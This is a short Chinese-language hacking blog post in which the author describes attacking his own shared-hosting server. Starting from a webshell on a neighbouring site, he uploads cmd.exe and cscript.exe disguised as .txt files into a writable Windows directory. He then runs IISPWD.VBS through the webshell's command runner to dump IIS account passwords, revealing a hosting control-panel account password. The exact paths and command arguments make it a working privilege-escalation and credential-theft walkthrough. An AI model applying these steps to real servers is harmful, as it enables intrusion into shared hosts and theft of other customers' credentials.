本次是对自己的IDC服务器的一次友情检测。
本来服务器就已经拿了N次了。漏洞一直都放在那里。
结果总有人拿到权限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家分享下。解决正在学习中。遇到困惑的人。BS。 谢谢朋友们提醒我.其实我都知道。谢谢你们的友情提醒)
开始正题。拿到旁站权限。shell一个。支持ASPX 。主要读IIS 。
JanKer用自己网站做测试。 www.xxhackxx.com
星外虚拟主机,找到可以执行的目录
C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index
上传CMD.EXE cscript.EXE IISPWD.VBS
把EXE 改成TXT 上传
C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cmd.txt
C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cscript.txt
上传完毕
读
然后继续
CmdPath : C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cmd.txt
Argument : /c “C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/cscript.txt” e:/freehost/xxhackxx/web/iispwd.vbs
7i24虚拟主机管理平台受控端 freehostrunat 密码是爆出来的密码。我就不写出来了。密码会像7b41043919eec81c59f9eb95ac3bc456!7
不要以为这是什么加密。我也想了半天。什么都不像。结果是明文